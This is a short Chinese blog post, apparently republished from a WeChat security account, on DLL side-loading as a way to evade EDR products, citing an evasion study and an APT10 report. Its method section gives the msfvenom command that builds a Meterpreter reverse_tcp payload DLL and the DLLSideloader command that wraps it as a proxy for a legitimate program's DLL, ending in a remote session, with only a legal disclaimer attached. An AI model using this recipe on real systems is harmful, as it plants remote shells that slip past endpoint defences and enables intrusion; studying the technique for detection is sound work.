前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Sideloading DLL攻击

Sideloading DLL攻击

作者头像
鸿鹄实验室
发布2021-08-25 10:19:20
1.4K0
发布2021-08-25 10:19:20
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室

今天看到了国外的一个白皮书,地址如下:

https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deploy/jcp-01-00021.pdf

内容主要是各类技术在遇到EDR时能不能成功的绕过。

最后以一份表格总结了各类功能以及绕过效果:

我们可以看到,dll几乎绕过了所有的EDR,而这里的DLL指的便是Sideloading DLL。

Sideloading DLL最早应该是在一份APT报告中被提出来的,即DLL侧加载。

文档地址:

https://www.recordedfuture.com/apt10-cyberespionage-campaign/?__cf_chl_jschl_tk__=pmd_VKrHUzdleNocPJnRemvxCVGmjY8gkMwlsZM361GthcI-1629625791-0-gqNtZGzNAjujcnBszQil

原理如下:

即中间经过转发来加载恶意dll。

利用方法:

首先找到一个存在dll加载(或劫持)的程序,然后使用msf生成dll

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f dll -a x86 > payload.dll

然后使用DLLSideloader来生成我们的转发dll,工具地址:

https://github.com/SkiddieTech/DLLSideloader

然后生成所需的文件即可

代码语言:javascript
复制
Invoke-DLLSideLoad libcurl.dll payload.dll

然后执行exe文件,即可获取session。

请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-08-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档